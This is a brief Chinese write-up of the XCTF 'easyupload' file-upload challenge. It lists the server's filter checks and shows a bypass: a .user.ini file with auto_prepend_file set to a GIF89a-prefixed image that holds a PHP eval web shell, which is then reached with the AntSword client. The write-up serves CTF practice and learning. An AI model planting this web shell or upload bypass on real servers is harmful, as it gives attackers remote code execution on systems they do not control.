文件上传_easyupload

easyupload 攻防世界

绕过点：

*检查文件内容是否有php字符串

*检查后缀中是否有htaccess或ph

*检查文件头部信息

*文件MIME类型

---

.user.ini

.user.ini是php的全局配置文件，与.htaccess一样是目录配置文件

auto_prepend_file = <filename>	#包含在文件头
auto_append_file = <filename>	#包含在文件尾
----
.user.ini文件
auto_prepend_file=1.gif
1.gif
<?php eval($_POST["cmd"]);?>

.user.ini文件能使该文件及其子文件，下的所有php文件在运行 前/后 执行所指定的文件

---

方法：
1.使用<?=eval($_POST["cmd"]);?>绕过

2.使用 GIF89a 文件头绕过

3.上传.user.ini文件

GIF89a
auto_prepend_file=a.png

​ 上传a.png文件

GIF89a
<?=eval($_POST["cmd"]);?>

4.使用蚁剑进行连接